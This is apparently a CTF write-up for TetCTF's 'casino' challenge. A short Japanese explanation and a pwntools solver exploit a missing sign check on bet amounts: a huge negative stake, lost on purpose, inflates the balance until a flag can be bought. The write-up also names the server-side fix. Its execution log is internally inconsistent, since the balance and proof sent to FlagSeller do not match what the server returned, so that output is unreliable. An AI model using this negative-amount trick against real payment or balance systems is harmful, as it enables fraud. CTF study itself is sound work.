casino

831

Description

Not really crypto...

Service

192.53.115.129:31338

File

https://drive.google.com/file/d/1UfeHQzvoRhCN1nVMokdviybhc7jozPcN/view?usp=share_link

Author

@ndh

ユーザ登録→Bet→Proof表示→フラグ表示の流れ。
Betでは、0~2023の乱数を当てれば掛け金の分だけ残高が増える。外した場合は掛け金が残高から引かれるが、サーバーは掛け金(Amount)の符号を検証していないため、負の値を指定してわざと外すと残高が増えてしまう。本来はサーバー側で、Amountが正の値であり、かつ残高以下であることを確認すべきである。
したがって、以下のプログラムを実行するとフラグを得ることができる。

from pwn import *
import argparse
import json
import base64

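# Solver for the "casino" challenge.
#
# Root cause, judging by the service's own reply ("YOU LOSE ... Current
# balance: ... (--9999...)"): a lost bet is settled as `balance - Amount`
# with no check on the sign of Amount, so a negative stake raises the
# balance. The server-side fix is to reject Amount <= 0 (and Amount greater
# than the current balance) before the bet is settled.

# NOTE: --local is parsed but never used; the target address below is fixed.
parser = argparse.ArgumentParser()
parser.add_argument('--local', action='store_true')
args = parser.parse_args()

context.log_level = 'debug'

USERNAME = "aaa"


def send_command(conn, recipient, command, **fields):
    """Send one JSON request line and return the raw reply line.

    Args:
        conn: connected pwntools tube.
        recipient: value of the "Recipient" field ("Casino" or "FlagSeller").
        command: value of the "Command" field.
        **fields: extra request fields, appended after "Username" in the
            order given.

    Returns:
        The reply line as bytes, including the trailing newline.
    """
    request = {'Recipient': recipient, 'Command': command, 'Username': USERNAME}
    request.update(fields)
    # json.dumps() returns str; encode explicitly so the tube receives bytes.
    conn.sendline(json.dumps(request).encode())
    reply = conn.recvline()
    print(reply)
    return reply


def fetch_balance_with_proof(conn):
    """Request "ShowBalanceWithProof" and parse the "<balance>, <proof>" reply.

    Returns:
        (balance, proof): balance as int, proof as base64-encoded bytes.

    Raises:
        ValueError: if the reply has no comma-separated proof field or the
            balance is not an integer.
    """
    reply = send_command(conn, "Casino", "ShowBalanceWithProof")
    balance_part, sep, proof_part = reply.partition(b',')
    if not sep:
        raise ValueError(f"unexpected ShowBalanceWithProof reply: {reply!r}")
    proof = proof_part.strip()
    # Sanity check only: the decoded bytes are not used, the proof is
    # forwarded to FlagSeller in its base64 form.
    base64.b64decode(proof)
    return int(balance_part.strip()), proof


p = remote('192.53.115.129', 31338)
try:
    send_command(p, "Casino", "Register")
    balance, proof = fetch_balance_with_proof(p)

    # Negative stake plus a guess (N) that is expected to miss: the "loss"
    # is subtracted from the balance, which therefore increases.
    send_command(
        p, "Casino", "Bet",
        Amount=-99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999,
        N=1,
    )

    # Re-read the balance so the proof matches the post-bet state.
    balance, proof = fetch_balance_with_proof(p)

    send_command(
        p, "FlagSeller", "PrintFlag",
        Balance=balance,
        proof_data=proof.decode(),
    )
finally:
    # Close the connection even if a reply could not be parsed.
    p.close()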

以下は実行結果。
    b'{"Recipient": "Casino", "Command": "Register", "Username": "aaa"}\n'

    b'Added user: aaa.\n'

    b'{"Recipient": "Casino", "Command": "ShowBalanceWithProof", "Username": "aaa"}\n'

    b'2023, GikKA2FhYRIgQPJb1twwnZ8heEnF0bSrB68jO9RSatr+X608MrQ7cmYYAQ==\n'

    b'{"Recipient": "Casino", "Command": "Bet", "Username": "aaa", "Amount": -99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999, "N": 1}\n'        

    b'YOU LOSE (1566 != 1)! Current balance: 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002022 (--99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).\n'

    b'{"Recipient": "Casino", "Command": "ShowBalanceWithProof", "Username": "aaa"}\n'
   
    b'10000002022, GikKA2FhYRIgOohZ458ucROd7O1Ws/ZcaRC0y9NA5Xf4+XlNGn9OTkMYAg==\n'

    b'{"Recipient": "FlagSeller", "Command": "PrintFlag", "Username": "aaa", "Balance": 100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002022, "proof_data": "GikKA2FhYRIgJF8T4TuyAYwBc7tMOKcmigommLseeRuY5AFg1FI/WmUYAg=="}\n'

    b'Your flag is: TetCTF{fr0m_n3g4t1v3n3ss_t0_b4nkruptcy}\n'